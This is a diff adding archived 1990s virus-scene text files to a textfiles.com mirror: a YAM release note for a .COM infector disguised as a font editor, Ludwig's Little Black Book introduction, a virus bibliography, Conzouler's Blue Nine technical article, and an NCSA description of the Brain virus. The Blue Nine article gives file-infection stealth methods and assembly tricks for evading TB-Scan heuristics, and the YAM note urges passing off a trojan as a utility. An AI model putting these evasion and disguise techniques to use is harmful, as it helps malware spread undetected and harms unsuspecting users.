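Review bot: the file opens directly on the "=====================[ BLONDE INTERVIEW ]=====" banner with no zine header before it, so the hunk reads as a single article cut out of a larger Immortal Riot issue (the intro itself refers to "IR#5" and to including the interview "anyhow"); if textfiles.com hosts it that way the import is fine as-is, but the file path or a companion index entry should record which issue it belongs to, otherwise the editorial asides ("(* ... - TU *)", "Rb's secret comment") and the "TU = The Unforgiven / BL = Blonde" key have no surrounding context. The body should stay verbatim, misspellings ("independant", "wich", "probebly") and the TWL/HNS dial-up number included, since the value of the mirror is that it is byte-for-byte.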
@@ -0,0 +1,58 @@ + + + + + + + + + + + + + + + + + +ķ + / A Youngsters Against McAfee Production \ +Ľ +ķ + DISCLAIMER : By unzipping this file you hearby agree that YAM is not + responsible for any damage that it does to your computer or anybody's + else's computer. We are also not responsible for what you or anyone else + does with the files included, be it running it on someone else's computer + or by running it on your own computer. (If your dumb enough too) +Ľ +ķ + / Executable Information \ +Ķ + Virus / Trojan Name : The Bed Time Virus + Author / Modification By : Admiral Bailey (Author) + Language Used : Assembly Language [TASM 2.0] + Type of Virus / Trojan : Memory Resident .COM Infector + Date Of Release : 11-16-92 +Ķ + Some Notes: + Well another release. My 4th in 4-5 days. This time its a Memory + resident .COM infector. Like before I only encrypted The messeges. They + change also. This is my first time at a ressy so don't laugh. Just enjoy + If you wanna know what this does then feel free to disassemble it. I don't + care. Well see you next time. BTW its disguised as a font editing program + so just remember to remove this before uploading to any lame PD boards. + + Don't forget to check out some of my latest releases: + Totally Whacked Out Virus Writer's Manual Parts I & II + The Stinking Butt Virus (What a name?!) +Ķ + Look for Evolution 2. Comming soon to a board near you. + Call The Full Moon [YAM WHQ] for all the latest YAM releases. + If you think your good enough why don't you call the YAM WHQ and apply + to be a YAM member today. Basic requirements are a knowledge of + assembly, virii and how they work. +Ķ +If you like this virus then support the author by letting them know. A small + piece of E-Mail can go a long way in a future release. +Ľ + diff --git a/textfiles.com/virus/blckbook.txt b/textfiles.com/virus/blckbook.txt new file mode 100644 index 00000000..6c76cdaf --- /dev/null +++ b/textfiles.com/virus/blckbook.txt 
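Review bot: the box-drawing frame of the .nfo has been lost to a character-set mismatch: the lines that should carry CP437 line-drawing characters appear as stray "ķ", "Ľ" and "Ķ" with the horizontal rules missing entirely, which means the bytes were decoded as a single-byte Western encoding rather than CP437 before being committed. Either commit the original bytes untouched (the safest choice for an archive mirror) or convert once with `iconv -f CP437 -t UTF-8` so the frame around "A Youngsters Against McAfee Production" and the "Executable Information" block renders; the present file is neither the original nor readable UTF-8. The prose inside the frame (date "11-16-92", "Memory Resident .COM Infector", "TASM 2.0") is intact and should not be edited.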
@@ -0,0 +1,483 @@ +--- + +WARNING: This book contains complete source code for live +computer viruses which could be extremely dangerous in the hands +of incompetent persons. You can be held legally liable for the +misuse of these viruses, even if such misuse is unintentional. Do +not attempt to execute any of the code in this book unless you +are well versed in systems programming for personal computers, +and you are working on a carefully controlled and isolated +computer system. + +--- + + The Little Black Book Of Computer Viruses + + Volume One: + + The Basic Technology + + By Mark A. Ludwig + + American Eagle Publications, Inc. + Post Office Box 41401 + Tucson, Arizona 85717 + - 1991 - + + And God saw that it was good, + And God blessed them, saying + "Be fruitful and multiply." + + Genesis 1:21,22 + + + + + + +============ +INTRODUCTION +============ + + + This is the first part in a series of three books about +computer viruses. In these volumes, I want to challenge you to +think in new ways about viruses, and break down false concepts +and wrong ways of thinking, and go on from there to discuss the +relevance of the computer viruses in today's world. These books +are not a call to a witch hunt, or manuals for protecting +yourself from viruses. On the contrary, they will teach you how +to design viruses, deploy them, and make them better. All three +volumes are full of source code for viruses, including both new +and well known varieties. + + It is inevitable that these books will offend some people. +In fact, I hope they do. They need to. I am convinced that +computer viruses are not evil and that programmers have the right +to create them, posses them and experiment with them. That kind +of a stand is going to offend a lot of people, no matter how it +is presented. Even a purely technical treatment of viruses which +simply discussed how to write them and provided some examples +would be offensive. 
The mere thought of a million well armed +hackers out there is enough to drive some bureaucrats mad. These +books go beyond a technical treatment, though, to defend the idea +that viruses can be useful, interesting, and just plain fun. That +is bound to prove even more offensive. Still, the truth is the +truth, and it needs to be spoken, even if it is offensive. Morals +and ethics cannot be determined by a majority vote, any more than +they can be determined by the barrel of a gun or loud mouth. +Might does not make right. + + If you turn out to be one of those people who gets offended +or upset, or if you find yourself violently disagreeing with +something I say, just remember what an athletically minded friend +of mine once told me: "No pain, no gain." That was in reference +to muscle building, but the principle applies intellectually as +well as physically. If someone only listens to people he agrees +with, he will never grow and he'll never succeed beyond his +little circle of yes-men. On the other hand, a person who listens +to different ideas at the risk of offense, and who at least +considers that he might be wrong, cannot but gain from it. So if +you are offended by something in this book, please be critical - +both of the book and of yourself- and don't fall into a rut and +let someone else tell you how to think. + + From the start I want to stress that I do not advocate +anyone's going out and infecting an innocent party's computer +system with a malicious virus designed to destroy valuable data +or bring their system to a halt. That is not only wrong, it is +illegal. If you do that, you could wind up in jail or find +yourself being sued for millions. However, this doesn't mean that +it is illegal to create a computer virus and experiment with it, +even though I know some people wish it was. If you do create a +virus, though, be careful with it. Make sure you know it is +working properly or you may wipe out your own system by accident. 
+And make sure you don't inadvertently release it into the world, +or you may find yourself in a legal jam... Even if it was just an +accident. The guy who loses a year's worth of work may not be so +convinced that it was an accident. And soon, it may be illegal to +infect a computer system (even your own) with a benign virus +which does no harm at all. The key word here is responsability. +Be responsible. If you do something destructive, be prepared to +take responsability. "The program included in this book could be +dangerous if improperly used. Treat them with the respect you +would have for a lethal weapon." + + This first of three volumes is a technical introduction to +the basics of writing computer viruses. It discusses what a virus +is and how it does its job, going into the major functional +components of the virus, step by step. Several different types of +viruses are developed from the ground up, giving the reader +practical how-to information for writing viruses. That is also a +prerequisite for decoding and understanding any viruses one may +run across in his day to day computing. Many people think of +viruses as sort of a black art. The purpose of this volume is to +bring them out of the closet and look at them matter-of-factly, +to see them for what they are, technically speaking: computer +programs. + + The second volume discusses the scientific applications of +computer viruses. There is a whole new field of scientific study +known as artificial life (AL) research which is opening up as a +result of the invention of viruses and related entities. Since +computer viruses are functionally similar to living organisms, +biology can teach us a lot about them, both how they behave and +how to make them better. However, computer viruses also have the +potential to teach us something about living organisms. We can +create and control computer viruses in a way that we cannot yet +control living organisms. 
This allows us to look at life +abstractly to learn about what it really is. We may even reflect +on such great questions as the beginning and subsequent evolution +of life. + + The third volume of this series discusses military +applications for computer viruses. It is well known that computer +viruses can be extremly destructive, and that they can be +deployed with minimal risk. Military organizations throughout the +world know that too, and consider the possibility of viral attack +both a very real threat and very real offensive option. Some high +level officials in various countries already believe their +computers have been attacked for political reasons. So the third +volume will probe military strategies and real-life attacks, and +dig into the development of viral weapon systems, defeating anti- +viral defenses, etc. + + You might be wondering at this point why you should spend +time studying these volumes. After all, computer viruses +apparently have no commercial value apart from their military +applications. Learning how to write them may not make you more +employable, or give you new techniques to incorporate into +programs. So why waste time with them, unless you need then to +sow chaos among your ennemies? Let me try to answer that: Ever +since computers were invented in the 1940's, there has been a +brotherhood of people dedicated to exploring the limitless +possibilities of these magnificent machines. This brotherhood has +included famous mathematicians and scientists, as well as +thousands of unnamed hobbyists who built their own computers, and +programmers who love to dig into the heart of their machines. As +long as computers have been around, men have dreamed of +intelligent machines which would reason, and act without being +told step by step just what to do. For many years this was purely +science fiction. However, the very thought of this possibility +drive some to attempt to make it a reality. This "artificial +intelligence" was born. 
Yet AI applications are often driven by +commercial interests, and tend to be colored by the fact. Typical +results are knowledge bases and the like - useful, sometimes +exciting, but also geared toward putting the machine to use in a +specific way, rather that to exploring it on its own terms. + + The computer virus is a radical new approach to this idea of +"living machines." Rather that trying to design something which +poorly mimics highly complex human behavior, one starts by trying +to copy the simplest of living organisms. Simple one-celled +organisms don't do very much. The most primitive organisms draw +nutrients from the sea in the form of inorganic chemicals, and +take energy from the sun, and their only goal is apparently to +survive and to reproduce. They aren't very intelligent, and it +would be tough to argue about their metaphysical aspects like +"soul." Yet they do what they were programmed to do, and they do +it very effectively. If we were to try to mimic such organisms by +building a machine - a little robot - which went around +collecting raw materials and putting them together to make +another robot, we would have a very difficult task on our hands. +On the other hand, think of a whole new universe - not this +physical world, but an electronic one, which exists inside of a +computer. Here is the virus' world. Here it can "live" in a sense +not too diffrentt from that of primitive biological life. The +computer virus has the same goal as a living organism - to +survive and to reproduce. It has environmental obstacles to +overcome, which could "kill" it and render it inoperative. And +once it is released, it seems to have a mind of its own. It runs +off in its electronic world doing what it was programmed to do. +In this sense it is very much alive. + + There is no doubt that the beginning of the life was an +important milestone in the history of the earth. 
However, if one +tries to consider it from the viewpoint of inanimate matter, it +is difficult to imagine life as being much more than a nuisance. +We usually assume that life is good and that it deserves to be +protected. However, one cannot take a step further back and see +life as somehow beneficial to the inanimate world. If we consider +only the atoms of the universe, what difference does it make if +the temperature is seventy degrees farenheit or twenty million? +What difference would it make if the earth were covered with +radioactive materials? None at all. Whenever we talk about the +environment and ecology, we always assume that life is good and +that it should be nurtured and preserved. Living organisms +universally use the inanimate world with little concern for it, +from the smallest cell which freely gathers the nutrients it +needs and pollutes the water it swims in, right up to the man who +crushes up rocks to refine the metals out of them and build +airplanes. Living organisms use the material world as they see +fit. Even when people get upset about something like strip +mining, or an oil spill, their point of reference is not that of +inanimate nature. It is an entirely selfish concept (with respect +to life) that motivates them. The mining mars the beauty of the +landscape - a beauty which is in the eye of the (living) beholder +- and it makes it unhabitable. If one did not place a special +emphasis on life, one could just as well promote strip mining as +an attempt to return the earth to its pre-biotic state! + + I say all of this not because I have a bone to pick with +ecologists. Rather I want to apply the same reasoning to the +world of computer viruses. As long as one uses only financial +criteria to evaluate the worth of a computer program, viruses can +only be seen as a menace. What do they do besides damage valuable +programs and data? 
They are ruthless in attempting to gain access +to the computer system resources, and often the more ruthless +they are, the more successful. Yet how does that differ from +biological life? If a clump of moss can attack a rock to get some +sunshine and grow, it will do so ruthlessly. We call that +beautiful. So how different is that a computer virus attaching +itself to a program? If all one is concerned about is the +preservation of inanimate objects (which are ordinary programs) +in this electronic world, then of course viruses are a nuisance. + + But maybe there is something deeper here. That all depends +on what is most important to you, though. It seems that modern +culture has degenerated to the point where most men have no +higher goals in life than to seek their own personal peace and +prosperity. By personal peace, I do not mean freedom from war, +but a freedom to think and believe whatever you want without ever +being challenged in it. More bluntly, the freedom to live in a +fantasy world of your own making. By property, I mean simply an +ever increasing abundance of material possessions. Karl Marx +looked at all of mankind and said that the motivating force +behind every man is his economic well being. The result, he said, +is that all of history can be interpreted in terms of class +struggles - people fighting for economic control. Even though +many in our government decry Marx as the father of communism, our +nation is trying to squeeze itself into the straight jacket he +has laid for us. That is why two of George Bush most important +campaign promises were "four more years of prosperity" and "no +new taxes." People vote for their wallets, even when they know +the politicians are lying through their teeth. + + In a society with such values, the computer becomes merely a +resource which people use to harness an abundance of information +and manipulate it to their advantage. 
If that is all there is to +computers, then computer viruses are a nuisance, and they should +be eliminated. Surely there must be some nobler purpose for +mankind than to make money, though, even though that may be +necessary. Marx may not think so. The government may not think +so. And a lot of loud-mouthed people may not think so. Yet great +men from every age and every nation testify to the truth that man +does have a higher purpose. Should we not be as Socrates, who +consider himself ignorant, and who sought Truth and Wisdom, and +valued them more highly than silver and gold? And if so, the +question that really matters is not how computers can make us +wealthy or give us power over others, but how they might make us +"wise". What can we learn about ourselves? About our world and, +yes, maybe even about God? Once we focus on that, computer +viruses become very interesting. Might we not understand life a +little better if we can create something similar, and study it, +and try to understand it? And if we understand life better, will +we not understand our lives, and our world better as well? + + + A word of caution first: Centuries ago, our nation was +etablished on philosophical principles of good government, which +were embodied in the Declaration of Independence and +Constitution. As personal peace and prosperity have become more +important than principles of good government, the principles have +been manipulated and redefined to suit the whims of those who are +in power. Government has become less and less sensitive to civil +rights, while it has become easy for various political and +financial interests to manipulate our leaders to their adventage. + + Since people have largely ceased to challenge each other in +what they believe, accepting instead the idea that whatever you +want to believe is OK, the government can no longer get people to +obey the law because everyone believes in a certain set of +principles upon which the law is founded. 
Thus, government must +coerce people into obeying it with increasingly harsh penalities +for disobedience - penalities which often fly in the face of long +established civil rights. Furthermore, the government must +restrict the average man's ability to seek recourse. For example, +it is very common for the government to trample all over long- +standing constitutional rights when enforcing the tax code. The +IRS routinely forces hundreds of thousands of people to testify +against themselves. It routinely puts the burden of proof on the +accused, seizes his assets without trial, etc., etc. The bottom +line is that it is not expedient for the government to collect +money from its citizens if it has to proove their tax documents +wrong. The whole system would break down in a massive overload. +Economically speaking, it is just better to put the burden of +proof on the citizen, Bill of Rights or no. + + Likewise, to challenge the government on a question of +rights is practically impossible, unless your case happens to +serve the purposes of some powerful special interest group. In a +standard courtroom, one often cannot even bring up the subject of +constitutional rights. The only question to be argued is whether +or not some particular law was broken. To appeal to the Supreme +Court will cost millions, if the politically motivated justices +will even condescend to hear to case. So the government becomes +pratically all-powerful, God walking on earth, to the common man. +One man seems to have little recourse but to blindy obey those in +power. + + + When we start talking about computer viruses, we're treading +on some ground that certain people want to post a "No Trepassing" +sign on. The congress of the United States has considered a +"Computer Virus Eradication Act" which would make it a felony to +write a virus, or for two willing parties to exchange one. Never +mind that the constitution garantees freedom of speech and +freedom of the press. 
Never mind that it garantees the citizens +the right to bear military arms (and viruses might be so +classified). While that law has not passed as of this writing, it +may by the time you read this book. If so, I will say without +hesitation that it is a miserable tyranny, but one that we can do +little about... for now. + + Some of our leaders may argue that many people are not +capable of handling the responsability of power that comes with +understanding computer viruses, just as they argue that people +are not able to handle the power of owning assault rifles or +machine guns. Perhaps some cannot. But I wonder, are our leaders +any better able to handle the much more dangerous weapons of law +and limitless might? Obviously they think so, since they are busy +trying to centralize all power into their own hands. I disagree. +If those in government can handle power, then so can the +individual. If the individual cannot, then neither can his +representatives, and our end is either tyranny or chaos anyhow. +So there is no harm in attempting to restore some small power to +the individual. + + But remember: truth seekers and wise men have been +persecuted by powerful idiots in every age. Although computer +viruses may be very interesting and worthwhile, those who take an +interest in them may face some serious challenges from base men. +So be careful. + + Now join with me and take the attitude of early scientists. +These explorers wanted to understand how the world worked - and +whether it could be turned to a profit mattered little. They were +trying to become wiser in what's really important by +understanding the world a little better. After all, what value +could there be in building a telescope so you could see the moons +around Jupiter? Galileo must have seen something in it, and it +must have meant enough to him to stand up to the ruling +authorities of his day and do it, and talk about it, and +encourage others to do it. And to land in prison for it. 
Today +some people are glad he did. + + So why not take the same attitude when it comes to creating +life on a computer? One has to wonder where it might lead. Could +there be a whole new world of electronic life forms possible, of +which computer viruses are only the most rudimentary sort? +Perhaps, they are the electronic analog of the simplest one- +celled creatures, which were only the tiny beginning on life on +earth. What would be the electronic equivalent of a flower, or a +dog? Where could it lead? The possibilities could be as exciting +as the idea of a man actually standing on the moon would have +been to Galileo. We just have no idea. + + There is something in certain men that simply drives them to +explore the unknown. When standing at the edge of a vast ocean +upon which no ship ever sailed, it is difficult not to wonder +what lies beyond the horizon just because the rules of the day +tell you you're going to fall of the edge of the world (or +they're going to push you off) if you try to find out. Perhaps +they are right. Perhaps there is no value out there. Yet great +explorers down trough the ages have explored other oceans and +succeeded. And one thing is for sure: we'll never know if someone +doesn't look. So I would like to invite you to climb aboard the +little mast that I have built and go exploring... +--- + Bibliography on Viruses. + +The following is a list of books on the subject of computer +viruses and virus-related topics that I have accumulated over the +years. It is not meant to be all-inclusive or a complete guide +on the subject and inclusion here is not to be concluded as being +an endorsement of any sort. + +Aryeh Goretsky TEL: (408) 988-3832 +Mgr, Tech Support Dept FAX: (408) 970-9727 +McAfee Associates, Inc. BBS: (408) 988-3832 +3350 Scott Blvd, Bldg 14 CIS: 76702,1714 Santa +Clara, CA 95054-3107 Internet: +aryehg@mcafee.COM +_________________________________________________________________ + +Burger, Ralf. 
COMPUTER VIRUSES: A HIGH-TECH DISEASE, 3rd Ed. +Abacus Press, Grand Rapids, MI: 1989. 276pp + +______, ____. COMPUTER VIRUSES AND DATA PROTECTION. Abacus +Press, Grand Rapids, MI: 1991. 353pp + +Denning, Peter J., Ed. COMPUTERS UNDER ATTACK: INTRUDERS, WORMS +AND VIRUSES, ACM PRESS: 1990. 554pp + +Ferreyra Cortes, Gonzalo. VIRUS EN LAS COMPUTADORAS (in Spanish), +Macrobit, Miami, FL: 1990. + +Fites, Philip, Peter Johnston, and Martin Kratz. COMPUTER VIRUS +CRISIS, THE, Van Nostrand Reinhold, NY: 1989. 171pp + +Haynes, Colin. THE COMPUTER VIRUS PROTECTION HANDBOOK, Sybex, +Alameda, CA: 1990. 192pp + +Hoffman, Lance J, Ed. ROGUE PROGRAMS: VIRUSES, WORMS, AND TROJAN +HORSES, Van Nostrand Reinhold, NY: 1990. 384pp + +Hruska, Jan. COMPUTER VIRUSES AND ANTI-VIRUS WARFARE. Ellis +Horwood, Ltd., West Sussex, UK: 1990. 128pp + +Jacobson, Robert V. THE PC VIRUS CONTROL HANDBOOK, 2nd Edition, +Miller Freeman Publications, NY: 1990. 162pp + +________, ________. USING McAFEE ASSOCIATES SOFTWARE FOR SAFE +COMPUTING. International Security Technology, NY: 1992. 143pp + +Jarvinen, Petteri. TIETOKONE VIRUKSET (in Finnish), Werner +Soderstrom Osakeyhtio, Helsinki: 1990. 226pp + +Javeri, Harsh, and Suchit Nanda. WAR ON VIRUS, The Computer Book +Shop, Bombay: 1990. 292pp + +Lundell, Allan. VIRUS! THE SECRET WORLD OF COMPUTER INVADERS THAT +BREED AND DESTROY. Contemporary Books, Chicago: 1989. 189pp + +McAfee, John, and Colin Haynes. COMPUTER VIRUSES, WORMS, DATA +DIDDLERS, KILLER PROGRAMS AND OTHER THREATS TO YOUR SYSTEM. St +Martins, NY: 1988. 235pp + +The following books, while not specifically about computer +viruses, contain information that may be of interest: + +Baker, Richard H. COMPUTER SECURITY HANDBOOK, 2nd Ed. TAB Books, +Blue Ridge Summit, PA: 1991. 416pp + +DeMaio, Harry B. INFORMATION PROTECTION AND OTHER UNNATURAL +ACTS., AMACOM, New York: 1992. 232pp + +Forester, Tom, and Perry Morrison. COMPUTER ETHICS: CAUTIONARY +TALES AND ETHICAL DILEMMAS IN COMPUTING. 
MIT Press, Cambridge: +1990. 193pp + +Jennings, Karla. THE DEVOURING FUNGUS: TALES OF THE COMPUTER AGE, +WW Norton & Co., NY: 1990. 237pp + +Mueller, Scott. QUE'S GUIDE TO DATA RECOVERY. QUE Corporation, +Carmel, IN: 498pp + +National Research Council. COMPUTERS AT RISK: SAFE COMPUTING IN +THE INFORMATION AGE. National Academy Press, Washington DC: 1991. +303pp + +Raymond, Eric, Ed. THE NEW HACKERS DICTIONARY., MIT Press, +Cambridge: 1991. 433pp + +Rothman, David H. THE COMPLETE LAPTOP COMPUTER GUIDE, St Martins, +NY: 1990. 384pp + +Sawicki, Ed. LAN DESKTOP GUIDE TO SECURITY, SAMS, Carmel, IN: +1992. 349pp + +Wilson, Ralph. HELP! THE ART OF COMPUTER TECHNICAL SUPPORT, +Peachpit Press, Berkeley: 1991. 231pp + +================================================================= diff --git a/textfiles.com/virus/bluenine.nfo b/textfiles.com/virus/bluenine.nfo new file mode 100644 index 00000000..787d91c7 --- /dev/null +++ b/textfiles.com/virus/bluenine.nfo 
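Review bot: this hunk's file is two distinct documents spliced together, and the splice should be recorded somewhere readers can find it: the essay ends at "go exploring...", a bare "---" line follows, and then "Bibliography on Viruses." begins with its own author and contact block (Aryeh Goretsky, McAfee Associates) before the file closes on a full-width "=====" rule. If the archive keeps per-file provenance, note both sources; otherwise consider whether the bibliography, which has its own header and a different author from the essay, belongs in a file of its own rather than behind an unlabeled separator.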
@@ -0,0 +1,205 @@ +% Blue Nine % + +Here is Conzouler's contribution to IR6. First, the textfile, then the +source code. Blue Nine is by the a poison used in the book Neuromancer, +which seem to has inspired quite a few viruswriters. Ah, just in case +you wondered - TU + + + A technical discussion about the Blue Nine virus + Written by: Conzouler. + (Terribly serious :-) + + + The Blue Nine virus was born on 19:th of November 1994. +It has about the same features as the Cybernetic Eel which I wrote this +summer but the code is much better and it doesn't disinfect files but +does instead redirect any reads from the infected areas of an infected +file, this method is, quite naturally, called redirection. It also makes +use of another infection engine, putting itself in the end of the +infected files. + + This version does not have any payloads, it just reproduces and hides +itself. But we are working on a Novell password stealer to add, hence +the redirection, it will work on write protected network drives and +disks too. We have some betas with a disk/file trasher and a joke on +the 25:th of any month, but they aren't distributed. + + Well, that was a brief description of it, now I will go in to +the details. + + First of all, when a program is executed it performs an installation +check and checks the dos version by setting cx to 666 and issuing get dos +version (int 21/ah=30). If the virus already is resident it will change cx +to 444 and the virus will just restore the host program in memory and jump +back to the entry point. If cx not equals 444 then the virus will check if +the dos version is higher 3.30 and, if so, go resident. + + If the installation checks fails the go resident routine will attempt to +allocate memory for the virus. First of all it has to deallocate some of +the memory allocated to the host program. This is done by moving the word at +cs-1:[3] to bx, subtracting the virus size from bx and issuing int21/ah=4A. 
+ Then it uses the int 21/ah=48 to allocate memory to itself. When the +memory has been allocated the virus has to determine its entry point +(the delta offset). To do that it fetches the word at cs:[101] which is +the address of the jmp instruction that jumps to the virus entry point. +Using this offset it sets ds:si to the start of the virus and es:di to +the beginning of the newly allocated memory. Cx is set to the size of +the virus, thus preparing for a rep movsb which will put the virus in +its own allocated memory block. + + The rep movsb instruction is replaced by the following code: + +label: lodsb + stosb + loop label + +This is exactly the same as rep movsb except that it destroys al and +that TB-Scan cannot find it. That means that TB-Scan does NOT emulate as +Venkmann says or possibly that the emulator is awfully bad. But that +doesn't matter, let's go on.. + + The virus will then jump to the int 21 hooking routine in the new +block by subtracting the segment address by 10h to compensate for the +PSP that is missing in the new block. This address and the offset of the +hooking routine are pushed and a retf will jump to the new block. + + The next step is to hook int 21. This is done using the normal dos +method, not by directly change the vectors. First it calls int 21/ax=3521 +to get the original vector. It then calls int 21/ax=2521 to put itself +in the vector. + + And now there is only one step left. It has to restore the host +program. Since the original first 3 bytes of the host are saved right +before the entry point (at offset 103 in our new block) it moves them to +offset 100h of the host and jumps there using a retf construction +similar to the one mentioned above. + + At this point the host program is running as usual, totally unaware of +the Blue Nine hiding in the dark, just waiting for an opportunity to +infect another unsuspicious program... + + The virus will infect any .com file that is run after the virus has +gone resident. 
It will also infect .com files in a dir listing on a +random basis (25% chance). + The infection is simple and effective. The virus opens its victim, +reads the first three bytes, searches to eof, appends itself and creates +a jump construct at the beginning of the file pointing to the start of +the virus. + + An infected file would look like this: + Ŀ + E9 xx xx <-- A jump to the virus entry point + Ĵ + Host <-- The original program except for the + program first three bytes. + .... + Ĵ + xx xx xx <-- The first three bytes of the original program + Ĵ + Virus <-- Guess what... + code... + + + + Now we have only the fun left, stealth... + + Size stealth: +After a successful find first/next using fcbs (ah=11/12) the fcbfind +routine will be called from the int 21 handler. First it filters out all +other files but those with extension .com. It then checks if the seconds +of the time field are set to 4, and if that is the case it will decrease +the size field with the virus size and return to dos. + If it is a .com file but the seconds don't match and the lowest 2 bits +of port 41 is zero (25% chance, 41 is the timer) then the filename will +be converted to a nul terminated ascii string, opened and sent to the +infection routine. + This will work on a dir command since Bill Gates is fucked up and +uses fcbs instead of handles as recommended since dos 2.11. + Since other programs like Norton uses handles I've added a similar +function for the calls 4E/4F (find first/next using handles) but I +haven't bothered doing an infection therein. + + Redirection, the innovation in this virus... + + The state of the art technique for avoiding checksummers and +self-checkers has been disinfection. Disinfection works very fine and +isn't too slow but it has one (minor) disadvantage, it doesn't work on +write protected disks and it doesn't work in networks where the file +are more likely to be write protected. 
+ + The solution that I've created to this problem is, like boot-sector +viruses, to redirect all reads from an infected area of a file. + When an infected file is opened using dos function 3D (open) or +6C00 (extended open) the virus will use the internal dos call +int 2F/ax=1220 which converts a handle to a number for an entry in +the system file tables (sft), this number is then converted to an address +to the specific sft for that file using int 2F/ax=1226. You can see +exactly how this is done in the getsft routine in the virus code. + The 14:th bit in the 5:th word from this address is set, marking +that the file's date/time should not be set on closing. The original +first three bytes of the file are read into the date/time field at +offset 0D in the sft and the last byte of the date/time field is set to +31 marking that the file is to be redirected. Then the size dword at +offset 11 in the sft is decreased by the size of the virus and the virus +returns to the caller. + Whenever this file is being read the virus +will catch the 3F (read from file) call and if the offset is within the +first 3 bytes of the file those will be replaced by those saved in the +date/time field. + The only catch with the redirection is that a file could be destroyed +if something (another virus for example) appends to the file. The simple +solution to this problem is to disinfect a file if a write is +attempted. + + All interrupt, calls and data structures referred to in this article +can be found in Ralph Brown's interrupt list. The sft and the memory +control block are described under the dos call get list of lists (int +21/ah=52), a cookie. The int 2F/1220/1226 calls are described in +separate entries in the interrupt list. + + Now I'm going to tell you about the TB-Fooling tricks in the Blue Nine + virus. + +* The int 21/ax=2521 call will set the Memory resident flag. + Just set ax to 2125 and perform an xchg ah,al instruction. 
+ +* The rep movsb will set the Relocation flag, just do as described + above. + +* Any write (int 21/40) will set the suspicious File access flag. + You can use this code: + mov ah, 40h xor 39 (or whatever) + xor ah, 39 + int 21h + +* The described 2F functions will also set the F flag. + The same code works even here: + mov ax, 1220h xor 4321 + xor ax, 4321 + int 21h + +* A read at cs:[101] will set the Delta offset flag, this can be avoided + by pushing this word and pop it into a register. + +* A compare with 'MZ' will cause the Z flag (exe/com determination). + Just xor both 'MZ' and the word you are checking with the same number + or xchg the word and compare it with 'ZM' instead. + +* A push of 100h followed by ret or retf will set the Back to entry point + flag. Remove by moving 100 to ax and pushing ax instead. + +The general method for removing a TB flag is to confuse the code a bit, +xor:ing, xchg:ing, pushing/poping all works fine, just try a few times. +If you cant guess where in the code a flag is you can use ';' to exclude +pieces of code and see if the flag disappears, just remember that a flag +can be in more than one position. + + That's all for this time folks... + ...until next time I may have done some multipartitite... + ...or maybe I'm just too lazy... + - Cya - + + - Conzouler - + + diff --git a/textfiles.com/virus/braininf.vir b/textfiles.com/virus/braininf.vir new file mode 100644 index 00000000..a31bcc2c --- /dev/null +++ b/textfiles.com/virus/braininf.vir 
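Review bot: the preamble promises more than the hunk delivers: "First, the textfile, then the source code" is followed only by the article, which ends at Conzouler's sign-off with nothing after it, so the file as added either lost its second half on capture or the preamble is misleading; a short note in the file description saying the source listing is not included would stop readers from hunting for it. Separately, the infected-file diagram is already broken in this hunk: the "Ŀ" and "Ĵ" runs are CP437 box-drawing glyphs transcoded as Latin characters, which means the file was read in the wrong code page on import; re-reading it as CP437 (or declaring the encoding in the repository) would keep the diagram intact.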
@@ -0,0 +1,146 @@ +Information on the Brain Virus And Variants +Prepared by David Stang +National Computer Security Association +Suite 309, 4401-A Connecticut Avenue NW +Washington, DC 20008 +(202) 364-8252 (voice) +(202) 364-1304 (BBS) +This material (c) 1989 NCSA. It may not be reproduced +without attribution to the NCSA. + +Synonyms: Pakistani Brain, Basit Virus. + +This virus originated in January, 1986, in Lahore +Pakistan, but the first noticeable infection problems +did not surface until 1988. In the spring of 1988, for +instance, 100 machines at The Providence Journal-Bulletin +were infected with it. + +The Brain is the only virus yet discovered that +includes the valid names address and phone numbers of +the original perpetrators. It was written by two +brothers running a computer store in Lahore Pakistan. +According to some sources, Basit Farooq Alvi, one of +the brothers, wrote the virus so that it would infect +machines running bootleg copies of a program he was +selling for physicians. The original Brain put a +copyright notice in the directory of floppy disks, but +did no other damage. + +The Brain is a boot sector infector, approximately 3 K +in length, that infects 5 1/4" floppies. It cannot +infect hard disks. It will infect a diskette whenever +the diskette is referenced. For example, a Directory +command, executing a program from the diskette, copying +a file from or to the diskette or any other access will +cause the infection to occur. The virus stores the +original boot sector, and six extension sectors, +containing the main body of the virus, in available +sectors which are then flagged as bad sectors. +Diskettes have 3K of bad sectors (the normal numbers +are none at all, or 5K, or sometimes more). + +No known intentional damage. Unintentional damage: it +slows down diskette accesses and causes time-outs, +which can make some diskette drives unusable. 
+ +The virus is able to hide from detection by +intercepting any interrupt that might interrogate the +boot sector and re-directing the read to the original +boot sector. Thus, programs like the Norton Utilities +will be unable to see the virus. + +Infected diskettes are noticeable by "@BRAIN" or "(c) +BRAIN" displayed in the volume label. + + + + Brain-B + +Synonyms: Brain-HD, the Hard Disk Brain, Houston Virus. + +This virus is identical in every respect to the +original Brain, with the single exception that it can +infect the C drive. + + + + Brain-C + +This virus is the Brain-B that has the volume label +code removed. The volume label of infected diskettes +does not change with this virus. This virus was +difficult to detect since it does nothing overt in the +system. + + + + Clone Virus + +This virus is the Brain-C that saves the original boot +copyright label and restores it to the infected boot. +The Basit & [A]mjad original Brain messages have been +replaced with non-printable garbage that looks like +instructions if viewed through Norton or other utility. +Even if the system is booted from a clean diskette, it +is virtually impossible to tell, by visual inspection, +whether the hard disk is infected. + + + + Shoe_virus + +Synonym: UIUC Virus. + +This virus is the Brain-B virus that has been modified +to include the message - "VIRUS_SHOE RECORD, v9.0. +Dedicated to the dynamic memories of millions of virus +who are no longer with us today". The message is never +displayed. + +This might be identified with the Ashar vrus, as there +is a VIRUS_SHOES RECORD v9.0 with the identifying +string "ashar" at offset 04a6hex. + + + + Shoe_virus-B + +Experts disagree on the classification of this. + +@BULLET = It may be the Shoe_Virus that has been +modified to so that it can no longer infect hard disks. +The v9.0 has been changed to v9.1. 
